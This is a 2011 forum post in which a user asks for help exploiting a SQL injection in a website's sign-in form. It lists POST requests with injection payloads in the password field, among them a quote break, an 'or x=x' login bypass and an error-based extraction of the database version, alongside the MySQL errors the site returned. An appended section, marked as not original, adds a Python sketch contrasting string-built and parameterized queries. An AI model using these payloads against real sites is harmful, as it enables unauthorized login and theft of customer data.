  #2  
12.08.2011, 12:16
YuNi|[c

Please help with this SQL injection, I can't exploit it.

Code:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')

Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')

Code:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')

Only email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x displays normally, but order by doesn't work.
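Added example, not part of the original post and not the site's own code: the error messages above show the password value being pasted into the SQL text and the full statement being echoed to the client. The sketch below reproduces that query shape next to a parameterized form; Python's sqlite3 stands in for the MySQL server, and the function names and sample row are assumptions constructed for illustration.

```python
import sqlite3

QUERY_TAIL = " AND (c.password IS NOT NULL AND c.password != '')"


def make_db():
    """In-memory stand-in database with one constructed customer row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customer (email TEXT, password TEXT)")
    db.execute("INSERT INTO customer VALUES ('eeee@eeeee.ee', 'stored-secret')")
    return db


def sign_in_concatenated(db, email, password):
    """Query shape seen in the error messages: input becomes SQL syntax."""
    sql = ("SELECT c.* FROM customer c WHERE c.email = '" + email +
           "' AND c.password = '" + password + "'" + QUERY_TAIL)
    return db.execute(sql).fetchall()


def sign_in_parameterized(db, email, password):
    """Same query with bound parameters: input is only ever compared as data."""
    sql = ("SELECT c.* FROM customer c "
           "WHERE c.email = ? AND c.password = ?" + QUERY_TAIL)
    return db.execute(sql, (email, password)).fetchall()


def outcome(fn, db, email, password):
    """Row count, or 'sql-error' when the database rejects the statement.

    A sign-in handler should log the exception server-side and return a
    generic failure, never the statement text shown in the post above.
    """
    try:
        return len(fn(db, email, password))
    except sqlite3.Error:
        return "sql-error"


if __name__ == "__main__":
    db = make_db()
    # The two password values are the ones quoted in the post.
    for pw in ("pppppp'", "pppppp' or 'x'='x", "stored-secret"):
        print(repr(pw),
              "concatenated:", outcome(sign_in_concatenated, db, "eeee@eeeee.ee", pw),
              "parameterized:", outcome(sign_in_parameterized, db, "eeee@eeeee.ee", pw))
```

With bound parameters both quoted inputs match zero rows and never reach the SQL parser as syntax, so there is no syntax error to disclose in the first place.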